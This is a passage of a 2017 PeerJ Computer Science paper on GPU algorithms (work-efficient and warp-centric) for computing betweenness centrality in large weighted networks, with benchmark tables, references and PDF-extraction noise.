∞ then 17: atomicMin(�,d[v] + �node v) 18: cnt ) 0 19: for v ∈ V do in parallel 20: F[v] ) 0 21: if U[v] = 1 and d[v] < � then 22: U[v] ) 0 23: F[v] ) 1 24: t ) atomicAdd(Slen,1) 25: S[t] ) v 26: atomicAdd(cnt,1) 27: if cnt > 0 then 28: ends[endslen] ) ends[endslen - 1] + cnt 29: endslen ) endslen + 1 Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 11/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ the lock, the thread will run the circulation but do nothing until the other thread releases the lock. In this way, all threads that need to inspect vertex w can perform the shortest- path task while avoiding race conditions. The lock cannot be replaced with an atomic operation because in the shortest-path procedure, multiple instructions related to w (from lines 7 to 13) are executed, rather than only one, and they cannot be interrupted by other threads that may modify d[w] and s[w]. After d and s have been computed for all nodes, we can obtain di based on the computed results, as seen on lines 14–17. Finally, U, F, S and ends are updated for the next iteration. Work-efficient method As seen on line 2 in Algorithm 4, threads will be assigned to all nodes, but calculations will be performed only for nodes in the frontier set, which may be inefficient. McLaughlin & Bader (2014, 2015) developed an excellent work-efficient technique for solving this problem. In this paper, we develop a work-efficient version of our algorithm by adopting Algorithm 5 Work-efficient BC: variable initialization. 1: for v ∈ V do in parallel 2: // initialize all variables except F 3: F[0] ) s 4: Flen = 1 5: // initialize other variables Algorithm 6 Work-efficient BC: shortest-path calculation using the Dijkstra algorithm. 1: while � < ∞ do 2: for 0 � i < Flen do in parallel 3: v ) F[i] 4: // inspect v 5: // calculate � 6: Flen ) 0 7: for v ∈ V do in parallel 8: if U[v] = 1 and d[v] < � then 9: U[v] ) 0 10: t ) atomicAdd(Flen, 1) 11: F[t] ) v 12: if Flen > 0 then 13: ends[end slen] ) end s[end slen - 1] + Flen 14: end slen ) end slen + 1 15: for 0 � i < Flen do in parallel 16: S[Slen + i] ) F[i] 17: Slen ) Slen + Flen Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 12/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ this idea. F is replaced with a queue that stores all frontier nodes, and a variable Flen is defined to recode the length of F, as seen in Algorithm 5. Then, at line 2 in Algorithm 6, threads can be assigned to F[0] ∼ F[Flen - 1], which may be much smaller than the total number of nodes. At the same time, the method used to update F should also be modified as shown in Algorithm 6. Warp-centric method Many real-world networks are scale-free in nature, which means that their degree distributions follow a power law. When parallel graph algorithms are implemented using the node-parallel strategy, this feature gives rise to a severe load-imbalance problem. Most nodes have low degrees, while some nodes have extremely high degrees. Threads that are assigned to high-degree nodes will run slowly, and other threads will have to wait. The edge-parallel strategy can be used to solve this problem (Jia et al., 2011), but it simultaneously introduces other problems of underutilization. In this paper, we apply the novel warp-centric method (Hong et al., 2011), in which a warp rather than a thread is allocated to a single node. Then, each thread within a warp focuses on a subset of the edges connected to the corresponding node. As a result, each thread does less work for nodes with high degrees, and the wait time will be greatly decreased. Moreover, memory access patterns can be more tightly grouped compared with conventional thread-level task allocation, and consequently, the efficiency of memory access can also be fundamentally improved. Nevertheless, the warp-centric method also has some disadvantages. First, the degree of a node may be smaller than the warp size, which is always 32 in modern GPUs. To solve this problem, Hong et al. (2011) proposed virtual warps. Second, the number of required threads will be increased overall because each node needs WARP_SIZE threads Figure 2 Examples of thread allocation using (A) the node-parallel method and (B) the work- efficient method. Red nodes and white nodes are frontier and non-frontier nodes, respectively, and each arrow represents a warp, which contains multiple threads that are all assigned to the same node. In the warp-centric method, more threads will be wasted on non-frontier nodes that do not need to be inspected. However, this problem can be solved by combining the warp-centric and work-efficient methods, as shown in (B). Full-size DOI: 10.7717/peerj-cs.140/fig-2 Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 13/23 http://dx.doi.org/10.7717/peerj-cs.140/fig-2 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ rather than one thread in this approach (here, WARP_SIZE denotes the number of threads in each warp). However, the number of threads per block is fixed; hence, each thread will be iteratively assigned to additional nodes, which may result in low performance. We find that the work-efficient technique can effectively relieve this problem because it requires fewer threads compared with the conventional node-parallel method, as seen in Fig. 2. In this paper, we apply the warp-centric method in combination with both the node-parallel and work-efficient methods, resulting in four algorithms with different thread allocation strategies, and we compare these algorithms on both real-world and synthetic networks. EXPERIMENTS Networks and settings We collected ten weighted real-world networks from the Internet. These networks are of a broad variety of types, including collaboration networks, biological networks and social networks. We also downloaded a large synthetic network with 2 20 vertices and more than 44 million edges. These networks are publicly available on the Internet and have been analyzed extensively in previous studies (Rossi & Ahmed, 2015; Bansal et al., 2007; Palla et al., 2008; Barabási & Albert, 1999; Leskovec & Krevl, 2014; De Domenico et al., 2013; Leskovec, Adamic & Huberman, 2007; Bader et al., 2012, 2014). The details of these networks are listed in Table 1. We developed a parallel CPU algorithm based on graph-tool (https://graph-tool.skewed.de), which is an efficient network analysis tool whose core data and algorithms are implemented in C++, making it efficient for various graph-related algorithms, including betweenness calculations (https://graph-tool.skewed.de/performance). The BC calculation performed by this tool relies on the Boost Graph Library (Siek, Lee & Lumsdaine, 2001), and it supports the execution of parallel betweenness algorithms on weighted networks (Gregor & Lumsdaine, 2005) (http://www.boost.org/doc/libs/1_65_1/libs/ graph_parallel/doc/html/index.html). We ran our four GPU implementations on a GeForce GTX 1080 using the CUDA 8.0 Toolkit. The GeForce GTX 1080 is a compute-capable 6.1 GPU designed using the Pascal architecture that has 20 multiprocessors, 8 GB of device memory, and a clock frequency of 1,772 MHz. The CPU we used is an Intel Core i7-7700K processor. The Core i7-7700K has a frequency of 4.2 GHz, an 8 MB cache and eight physical processor cores. We used four threads since hyperthreading does not improve performance, and we also ran a sequential version because such implementations are still widely applied by network researchers. To further investigate the effects of network structures on the algorithms’ performance, we generated two types of networks: Erdös–Rényi (ER) random graphs (Erdös & Rényi, 1959) and Kronecker graphs (Leskovec et al., 2010). The degree distribution of an ER random graph is a Poisson distribution, meaning that its node degrees are relatively balanced. Meanwhile, a Kronecker graph possesses scale-free and small-world characteristics, making it appropriate for studying the load-imbalance problem. We uniformly assigned random edge weights ranging from 1 to 10, as done in previous studies (Martin, Torres & Gavilanes, 2009; Ortega-Arranz et al., 2013). We used these synthetic networks to study the relationship between the graph structure and the traversal strategy. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 14/23 https://graph-tool.skewed.de https://graph-tool.skewed.de/performance http://www.boost.org/doc/libs/1_65_1/libs/graph_parallel/doc/html/index.html http://www.boost.org/doc/libs/1_65_1/libs/graph_parallel/doc/html/index.html http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ Results Overall performance From Table 2, we can see that all of the GPU programs achieve better performance than both the sequential and parallel CPU versions on the real-world networks. The best GPU algorithm for each network achieves speedups of 2.9� to 8.44� compared with the parallel CPU method and of 10� to 20� compared with the sequential CPU algorithm, and the performance can be markedly improved by assigning an appropriate WARP_SIZE. Even on the two large networks with more than one million vertices, our algorithm can produce results within 2 or 3 days. Note that the performance of previous GPU-based BC algorithms for unweighted networks might be superior to ours on networks of similar sizes because the complexity of the weighted BC algorithm is higher than that of its unweighted counterparts. As seen from Table 2, the work-efficient method is more efficient than the node-parallel method on all networks, whereas the warp-centric method performs better on high-degree networks, such as the three biological networks. However, combining the warp-centric method and the work-efficient method always results in superior or approximately equal performance compared with the work-efficient method alone because it causes fewer threads to be required in each step, which, in turn, alleviates the second disadvantage of the warp-centric method. For networks with low average degrees, such as ca-MathSciNet-dir, rt-higgs and mt-higgs, applying the warp-centric method with the real WARP_SIZE (32) is always inefficient because the nodes’ degrees are always smaller than WARP_SIZE. Using a smaller virtual WARP_SIZE enables better performance on Table 1 Details of networks from public datasets. Network Vertices Edges Max degree Average degree Description bio-human-gene1 (Rossi & Ahmed, 2015; Bansal et al., 2007) 22,283 12,345,963 7,940 1,108.11 Human gene regulatory network bio-human-gene2 (Rossi & Ahmed, 2015; Bansal et al., 2007) 14,340 9,041,364 7,230 1,261.00 Human gene regulatory network bio-mouse-gene (Rossi & Ahmed, 2015; Bansal et al., 2007) 45,101 14,506,196 8,033 643.28 Mouse gene regulatory network ca-MathSciNet-dir (Rossi & Ahmed, 2015; Palla et al., 2008) 391,529 873,775 496 4.46 Co-authorship network actors (Barabási & Albert, 1999) 382,219 15,038,094 3,956 78.69 Actor collaboration network rt-higgs (Leskovec & Krevl, 2014; De Domenico et al., 2013) 425,008 732,827 31,558 3.45 Twitter retweeting network mt-higgs (Leskovec & Krevl, 2014; De Domenico et al., 2013) 116,408 145,774 11,957 2.50 Twitter mention network rec-amazon (Rossi & Ahmed, 2015; Leskovec, Adamic & Huberman, 2007) 91,813 125,704 5 2.74 Product copurchase network sc-shipsec1 (Rossi & Ahmed, 2015; Bader et al., 2012) 140,385 1,707,759 67 24.33 Scientific computing network soc-pokec (Leskovec & Krevl, 2014) 1,632,803 30,622,564 14,854 27.32 Pokec social network kron_g500 (Bader et al., 2014) 1,048,576 44,619,402 131,503 112.22 Large Kronecker network Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 15/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ these networks, as shown in Table 2, and we will also further demonstrate this later. With an appropriate adjustment of WARP_SIZE for low-degree networks, the best- performing program achieves average speedups of 5.2� compared with the parallel CPU implementation and 2.34� compared with the baseline node-parallel strategy. For the rec-amazon graph, which has the lowest maximum degree, the load-imbalance problem does not exist, and for this reason, the warp-centric method cannot improve the performance; instead, the algorithm in which the work-efficient strategy alone is applied performs the best. Influence of network structure To deeply investigate the relationship between network structure and performance for the four GPU implementations, we further ran these algorithms on two types of synthetic graphs, with the results shown in Fig. 3. From Figs. 3A to 3D, we find that the work-efficient algorithm performs better than the node-parallel algorithm on all networks since it always reduces the required number of threads. As seen in Figs. 3A and 3B, Table 2 Benchmark results of various BC algorithms on weighted graphs, including a sequential CPU algorithm, a four-thread CPU algorithm, and node-parallel (NP), work-efficient (WE) and warp-centric (warpx denotes that the WARP_SIZE is x) algorithms. Algorithm bio-human-gene1 bio-human-gene2 bio-mouse-gene ca-MathSciNet-dir actors CPU (sequential) 7,494.09 3,505.49 18,300.83 49,184.05 – CPU (4 threads) 2,245.61 1,023.48 5,460.26 21,169.81 89,196.19 NP 1,585.69 697.51 4,407.42 6,154.18 44,137.50 WE 1,398.47 612.14 3,742.69 4,796.71 37,803.60 NP+warp32 511.73 196.67 1,497.56 13,883.50 32,567.60 WE+warp32 403.51 159.68 1,214.86 4,969.10 25,382.20 WE+warp4 784.86 327.93 1,901.29 4,593.97 28,315.70 WE+warp8 562.48 229.53 1,365.80 4,579.23 25,469.50 WE+warp16 439.58 174.51 1,170.26 4,706.05 24,715.40 best speedup (over sequential CPU) 18.57� 21.95� 15.64� 10.74� – best speedup (over parallel CPU) 5.57� 6.41� 4.67� 4.62� 3.61� Algorithm rt-higgs mt-higgs rec-amazon sc-shipsec1 soc-pokec kron_g500 CPU (sequential) 54,717.96 1,829.63 2,116.82 9,763.16 – – CPU (4 threads) 21,522.20 746.84 656.59 4,046.30 – – NP 4,681.37 222.60 309.49 889.72 – – WE 4,197.30 197.24 226.55 776.21 – 317,922.00 (88.3 h) NP+warp32 6,205.65 337.89 1,115.83 1,478.78 – 245,450.82 (68.2 h) WE+warp32 4,757.07 215.46 282.98 527.08 284,498.82 (79 h) – WE+warp4 3,574.16 166.88 229.46 502.52 – – WE+warp8 3,641.77 169.14 238.03 479.26 – – WE+warp16 4,008.30 184.45 255.84 484.18 – – best speedup (over sequential CPU) 15.31� 10.96� 9.34� 20.37� – – best speedup (over parallel CPU) 6.02� 4.48� 2.90� 8.44� – – Notes: The times are expressed in seconds. The last two rows report speedups. The result of the CPU sequential algorithm on the actors network cannot be provided because this program consumed too much time on this network. For the same reason, we also ran only selected GPU algorithms on the two very large networks. Bold entries display running times of the fastest algorithms for specific networks. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 16/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ the warp-centric method works well on networks of high degrees, which is consistent with the findings for the real-world networks. Note that for Kronecker graphs, the warp-centric method works better than it does for random graphs since Kronecker graphs have a severe load-imbalance problem, which the warp-centric technique can appropriately address. By contrast, for ER random graphs, as shown in Fig. 3A, the only advantage of the warp-centric method is its efficient memory access. For low-degree graphs, the warp-centric method results in even worse performance than the node-parallel strategy, as can be seen in Figs. 3C and 3D, because the degrees are always smaller than WARP_SIZE. For random graphs, the performance of the warp-centric method is 0 2500 5000 7500 10000 14 15 16 17 18 scale : log2(number of nodes) tim e (s ) a 0 2000 4000 6000 14 15 16 17 18 scale : log2(number of nodes) tim e (s ) b 20 40 60 2 6 10 14 18 22 26 30 34 38 average degree tim e (s ) c 0 50 100 2 6 10 14 18 22 26 30 34 38 average degree tim e (s ) d node−parallel work−efficient warp−centric work−efficient+warp−centric 20 40 60 2 6 10 14 18 22 26 30 34 38 average degree a ve ra g e d e p th Kronecker random e Figure 3 Performance of the four implementations on ER random and Kronecker graphs. Here, WARP_SIZE is fixed to 32 in the two warp-centric methods. (A) and (B) show the results of varying the number of nodes from 2 14 to 2 18 for ER random and Kronecker graphs, respectively, with a fixed average degree of 32 for both types of networks. (C) and (D) show the results of varying the average degree for random and Kronecker networks, respectively, where the random networks contain 20,000 vertices and the Kronecker networks contain 2 15 nodes. (E) Illustrates the average depths of the search trees used for the random graphs in (C) and the Kronecker graphs in (D). Networks with greater depths have smaller average frontier sets, resulting in poor parallel performance. Full-size DOI: 10.7717/peerj-cs.140/fig-3 Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 17/23 http://dx.doi.org/10.7717/peerj-cs.140/fig-3 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ extremely poor when the average degree is smaller than 8, and Fig. 3E illustrates the reason. The low average degree results in a large average depth, which means that the average size of the frontier sets is small. In this case, the warp-centric method assigns more useless threads to nodes that do not need inspection. However, as the degree grows and approaches WARP_SIZE, the depth simultaneously drops sharply, which makes the warp-centric method perform much better. Meanwhile, low-degree Kronecker graphs have power-law degree distributions and small average depths; consequently, the warp-centric method does not perform as poorly as on random graphs. However, the combination of these two methods always results in faster performance than the work- efficient method alone because it avoids the second disadvantage of the warp-centric method, as discussed in the previous section. In conclusion, the work-efficient method always achieves better performance, whereas the performance of the warp-centric method depends on the network structure; however, an algorithm that combines the two always achieves the best performance. Analysis of warp size As seen from the above analysis, using a smaller WARP_SIZE may accelerate both the node-parallel and work-efficient implementations combined with the warp-centric method when the average degree of the network is small. This hypothesis is verified in Table 3. We applied smaller WARP_SIZE values on the rt-higgs network, the mt-higgs network and two synthetic graphs with an average degree of four. We find that implementations with smaller WARP_SIZE values perform better than either the baseline node-parallel algorithm or the algorithm with the largest WARP_SIZE on both of the low-degree real-world networks, rt-higgs and mt-higgs. Moreover, when coupled with the work-efficient method, algorithms with smaller WARP_SIZE values also perform better than either the work-efficient strategy alone or the combination of the work-efficient strategy and the largest WARP_SIZE. The reason is that a small WARP_SIZE reduces the required number of threads, thereby eliminating the waste incurred when the number Table 3 The results of using different values of WARP_SIZE on several low-degree networks. Network rt-higgs mt-higgs ER Kronecker node-parallel 4681.37 222.60 550.86 197.54 warp4 4182.84 205.47 578.09 159.74 warp8 4446.10 222.39 629.71 162.92 warp16 5088.25 260.28 805.60 179.60 warp32 6205.65 337.89 1294.71 250.16 WE 4197.30 197.24 435.93 133.84 WE+warp4 3574.16 166.88 413.36 118.90 WE+warp8 3641.77 169.14 420.20 115.25 WE+warp16 4008.30 184.45 449.54 115.12 WE+warp32 4757.07 215.46 501.69 118.61 Notes: WE is short for work-efficient algorithm. Both the ER network and the Kronecker network have 2 17 nodes, and the average node degree of each is four. The times are expressed in seconds. For these low-degree networks, implementations with smaller WARP_SIZE values achieve better performance. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 18/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ of threads assigned to a node is greater than its degree. The implementations with small WARP_SIZE values coupled with the work-efficient method achieve the best performance because they avoid both disadvantages of the warp-centric method while utilizing its advantages. The results obtained on the low-degree Kronecker graph are similar to those obtained on realistic networks for the same reason. For ER random graphs, algorithms with smaller WARP_SIZE values do not achieve better performance compared with the node-parallel version because of the large average tree depth, as discussed in the previous section. However, when the work-efficient method is applied, implementations with smaller WARP_SIZE values perform slightly better than the work-efficient algorithm alone, thereby further demonstrating the excellent performance and stability of the joint algorithm. In summary, the joint algorithm is the most efficient and the most insensitive to the network structure. Moreover, if we choose an appropriate WARP_SIZE for the graph of interest, the performance of the joint algorithm can be even further improved (see Tables 2 and 3). CONCLUSION Existing GPU versions of BC algorithms have concentrated only on unweighted networks for simplicity. Our work offers an algorithm for computing BC in large weighted networks, bridging this gap and enabling a marked efficiency enhancement compared with CPU implementations. Moreover, we incorporate two excellent techniques into our algorithm: the work-efficient and warp-centric methods. The work-efficient method allocates threads more efficiently, and the warp-centric method solves the load-imbalance problem while simultaneously optimizing memory access. We have compared these implementations with sequential and parallel CPU algorithms on realistic networks. The results show that the GPU parallel algorithms perform much better than the CPU algorithms and that the algorithm that combines both the work-efficient and warp-centric techniques is the best, achieving 2.9� to 8.44� speedups over the parallel CPU version and 10� to 20� speedups over the sequential CPU version. Results obtained on synthetic random graphs and Kronecker graphs further demonstrate the superior performance of our solution. In our future work, we will consider other techniques for addressing the load- imbalance problem to further improve the performance of our algorithm (Davidson et al., 2014; Wang et al., 2016). In addition, Solomonik et al. (2017) have proposed a parallel BC algorithm for weighted graphs based on novel sparse matrix multiplication routines that has achieved impressive performance, which may provide further inspiration for accelerating our algorithm. We may also consider implementing a GPU algorithm for processing dynamic networks. When networks change only slightly (e.g., a few new nodes are added or a few links vanish), recalculating the BC for all nodes is unnecessary because the BC of most nodes and edges will not change. Several previous works have explored sequential algorithms for addressing this issue (Lee, Choi & Chung, 2016; Singh et al., 2015; Nasre, Pontecorvi & Ramachandran, 2014). We plan to develop a GPU version of these algorithms to achieve better performance. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 19/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by NSFC (Grant No. 71501005) and the fund of the State Key Laboratory of Software Development Environment (Grant Nos. SKLSDE-2015ZX-05 and SKLSDE-2015ZX-28). Rui Fan is supported by the Innovation Foundation of BUAA for PhD Graduates. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NSFC: 71501005. State Key Laboratory of Software Development Environment: SKLSDE-2015ZX-05 and SKLSDE-2015ZX-28. Innovation Foundation of BUAA for PhD Graduates. Competing Interests The authors declare that they have no competing interests. Author Contributions � Rui Fan conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. � Ke Xu conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. � Jichang Zhao conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Zhao, Jichang (2017): A GPU-Based Solution to Fast Calculation of Betweenness Centrality on Large Weighted Networks. figshare. https://doi.org/10.6084/m9.figshare.4542405.v2 REFERENCES Abedi M, Gheisari Y. 2015. Nodes with high centrality in protein interaction networks are responsible for driving signaling pathways in diabetic nephropathy. PeerJ 3:e1284 DOI 10.7717/peerj.1284. Bader DA, Meyerhenke H, Sanders P, Schulz C, Kappes A, Wagner D. 2014. Benchmarking for Graph Clustering and Partitioning. New York: Springer, 73–82. Bader DA, Meyerhenke H, Sanders P, Wagner D, eds. 2012. Graph partitioning and graph clustering. In: 10th DIMACS Implementation Challenge Workshop, Atlanta, GA, Georgia. Bansal M, Belcastro V, Ambesi-Impiombato A, di Bernardo D. 2007. How to infer gene networks from expression profiles. Molecular Systems Biology 3:78 DOI 10.1038/msb4100120. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 20/23 https://doi.org/10.6084/m9.figshare.4542405.v2 http://dx.doi.org/10.7717/peerj.1284 http://dx.doi.org/10.1038/msb4100120 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ Barabási A-L, Albert R. 1999. Emergence of scaling in random networks. Science 286(5439):509–512 DOI 10.1126/science.286.5439.509. Barthélemy M. 2004. Betweenness centrality in large complex networks. European Physical Journal B 38(2):163–168 DOI 10.1140/epjb/e2004-00111-4. Bell N, Garland M. 2009. Implementing sparse matrix–vector multiplication on throughput- oriented processors. In: Proceedings of the Conference on High Performance Computing Networking, Storage and Analysis (SC’09). New York: ACM, 18:1–18:11. Brandes U. 2001. A faster algorithm for betweenness centrality. Journal of Mathematical Sociology 25(2):163–177. Cong G, Bader DA. 2005. An experimental study of parallel biconnected components algorithms on symmetric multiprocessors (SMPs). In: 19th IEEE International Parallel and Distributed Processing Symposium, Denver, CO, USA. Washington, D.C.: IEEE, 45b. Davidson A, Baxter S, Garland M, Owens JD. 2014. Work-efficient parallel GPU methods for single-source shortest paths. In: 2014 IEEE 28th International Parallel and Distributed Processing Symposium, Phoenix, AZ, USA. Washington, D.C.: IEEE, 349–359. De Domenico M, Lima A, Mougel P, Musolesi M. 2013. The anatomy of a scientific rumor. Scientific Reports 3(1):2980 DOI 10.1038/srep02980. Delling D, Goldberg AV, Nowatzyk A, Werneck RF. 2011. PHAST: hardware-accelerated shortest path trees. In: Proceedings of the 2011 IEEE International Parallel and Distributed Processing Symposium (IPDPS’11). Washington, DC: IEEE Computer Society, 921–931. Dijkstra EW. 1959. A note on two problems in connexion with graphs. Numerische Mathematik 1(1):269–271 DOI 10.1007/bf01386390. Erdös P, Rényi A. 1959. On random graphs I. Publicationes Mathematicae (Debrecen) 6:290–297. Floyd RW. 1962. Algorithm 97: shortest path. Communications of ACM 5(6):345 DOI 10.1145/367766.368168. Freeman LC. 1977. A set of measures of centrality based on betweenness. Sociometry 40(1):35–41 DOI 10.2307/3033543. Girvan M, Newman MEJ. 2002. Community structure in social and biological networks. Proceedings of the National Academy of Sciences of the United States of America 99(12):7821–7826. Goh K-I, Oh E, Kahng B, Kim D. 2003. Betweenness centrality correlation in social networks. Physical Review E 67(1):017101 DOI 10.1103/physreve.67.017101. Gregor D, Lumsdaine A. 2005. The parallel bgl: a generic library for distributed graph computations. In: Parallel Object-Oriented Scientific Computing (POOSC), Bloomington, IN, USA. Harish P, Narayanan PJ. 2007. Accelerating Large Graph Algorithms on the GPU Using CUDA. Berlin: Springer, 197–208. Hong S, Kim SK, Oguntebi T, Olukotun K. 2011. Accelerating CUDA graph algorithms at maximum warp. In: Proceedings of the 16th ACM Symposium on Principles and Practice of Parallel Programming (PPoPP’11). New York: ACM, 267–276. Jia Y, Lu V, Hoberock J, Garland M, Hart JC. 2011. Edge v. node parallelism for graph centrality metrics. GPU Computing Gems 2:15–30 DOI 10.1016/b978-0-12-385963-1.00002-2. Lee M-J, Choi S, Chung C-W. 2016. Efficient algorithms for updating betweenness centrality in fully dynamic graphs. Information Sciences 326(Supplement C):278–296 DOI 10.1016/j.ins.2015.07.053. Leskovec J, Adamic LA, Huberman BA. 2007. The dynamics of viral marketing. ACM Transactions on the Web (TWEB) 1(1):5 DOI 10.1145/1232722.1232727. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 21/23 http://dx.doi.org/10.1126/science.286.5439.509 http://dx.doi.org/10.1140/epjb/e2004-00111-4 http://dx.doi.org/10.1038/srep02980 http://dx.doi.org/10.1007/bf01386390 http://dx.doi.org/10.1145/367766.368168 http://dx.doi.org/10.2307/3033543 http://dx.doi.org/10.1103/physreve.67.017101 http://dx.doi.org/10.1016/b978-0-12-385963-1.00002-2 http://dx.doi.org/10.1016/j.ins.2015.07.053 http://dx.doi.org/10.1145/1232722.1232727 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ Leskovec J, Chakrabarti D, Kleinberg J, Faloutsos C, Ghahramani Z. 2010. Kronecker graphs: an approach to modeling networks. Journal of Machine Learning Research 11:985–1042. Leskovec J, Krevl A. 2014. SNAP datasets: Stanford large network dataset collection. Available at http://snap.stanford.edu/data. Leydesdorff L. 2007. Betweenness centrality as an indicator of the interdisciplinarity of scientific journals. Journal of the American Society for Information Science and Technology 58(9):1303–1319 DOI 10.1002/asi.20614. Ma X, Sayama H. 2015. Mental disorder recovery correlated with centralities and interactions on an online social network. PeerJ 3:e1163 DOI 10.7717/peerj.1163. Martin PJ, Torres R, Gavilanes A. 2009. Cuda solutions for the SSSP problem. In: Proceedings of the 9th International Conference on Computational Science: Part I (ICCS’09). Berlin: Springer-Verlag, 904–913. McLaughlin A, Bader DA. 2014. Scalable and high performance betweenness centrality on the GPU. In: Proceedings of the International Conference for High Performance Computing, Networking, Storage and Analysis (SC’14). Piscataway: IEEE Press, 572–583. McLaughlin A, Bader DA. 2015. Fast execution of simultaneous breadth-first searches on sparse graphs. In: 2015 IEEE 21st International Conference on Parallel and Distributed Systems (ICPADS), Melbourne, VIC, Australia. Washington, D.C.: IEEE Computer Society, 9–18. Merrill D, Garland M, Grimshaw A. 2015. High-performance and scalable GPU graph traversal. ACM Transactions on Parallel Computing 1(2):1–30 DOI 10.1145/2717511. Mitchell R, Frank E. 2017. Accelerating the XGBoost algorithm using GPU computing. PeerJ Computer Science 3:e127 DOI 10.7717/peerj-cs.127. Motter AE, Lai Y-C. 2002. Cascade-based attacks on complex networks. Physical Review E 66(6):065102 DOI 10.1103/physreve.66.065102. Nasre M, Pontecorvi M, Ramachandran V. 2014. Betweenness Centrality—Incremental and Faster. Berlin: Springer, 577–588. Ortega-Arranz H, Torres Y, Llanos DR, Gonzalez-Escribano A. 2013. A new GPU-based approach to the shortest path problem. In: 2013 International Conference on High Performance Computing Simulation (HPCS), Helsinki, Finland. Washington, D.C.: IEEE, 505–511. Palla G, Farkas IJ, Pollner P, Derényi I, Vicsek T. 2008. Fundamental statistical features and self-similar properties of tagged networks. New Journal of Physics 10(12):123026 DOI 10.1088/1367-2630/10/12/123026. Rossi RA, Ahmed NK. 2015. The network data repository with interactive graph analytics and visualization. In: Proceedings of the Twenty-Ninth AAAI Conference on Artificial Intelligence, Austin, Texas. Palo Alto: Association for the Advancement of Artificial Intelligence. Sariyüce AE, Kaya K, Saule E, Çatalyürek UV. 2013. Betweenness centrality on GPUs and heterogeneous architectures. In: Proceedings of the Sixth Workshop on General Purpose Processor Using Graphics Processing Units (GPGPU-6). New York: ACM, 76–85. Shi Z, Zhang B. 2011. Fast network centrality analysis using GPUs. BMC Bioinformatics 12(1):149 DOI 10.1186/1471-2105-12-149. Siek JG, Lee L-Q, Lumsdaine A. 2001. The Boost Graph Library: User Guide and Reference Manual, Portable Documents. Upper Saddle River, New Jersey: Pearson Education. Singh RR, Goel K, Iyengar SRS, Gupta S. 2015. A faster algorithm to update betweenness centrality after node alteration. Internet Mathematics 11(4–5):403–420 DOI 10.1080/15427951.2014.982311. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 22/23 http://snap.stanford.edu/data http://dx.doi.org/10.1002/asi.20614 http://dx.doi.org/10.7717/peerj.1163 http://dx.doi.org/10.1145/2717511 http://dx.doi.org/10.7717/peerj-cs.127 http://dx.doi.org/10.1103/physreve.66.065102 http://dx.doi.org/10.1088/1367-2630/10/12/123026 http://dx.doi.org/10.1186/1471-2105-12-149 http://dx.doi.org/10.1080/15427951.2014.982311 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ Solomonik E, Besta M, Vella F, Hoefler T. 2017. Scaling betweenness centrality using communication-efficient sparse matrix multiplication. In: Jackie K, ed. The International Conference for High Performance Computing, Networking, Storage and Analysis (s), Denver, CO, USA. New York: ACM. Wang Y, Davidson A, Pan Y, Wu Y, Riffel A, Owens JD. 2015. Gunrock: a high-performance graph processing library on the GPU. In: Proceedings of the 20th ACM SIGPLAN Symposium on Principles and Practice of Parallel Programming (PPoPP 2015). New York: ACM, 265–266. Wang Y, Davidson A, Pan Y, Wu Y, Riffel A, Owens JD. 2016. Gunrock: a high-performance graph processing library on the GPU. In: Proceedings of the 21st ACM SIGPLAN Symposium on Principles and Practice of Parallel Programming (PPoPP’16). New York: ACM, 11:1, 11:12. Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 23/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.140 A GPU-based solution for fast calculation of the betweenness centrality in large weighted networks Introduction Background Related Work GPU-Based Algorithm Experiments Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true 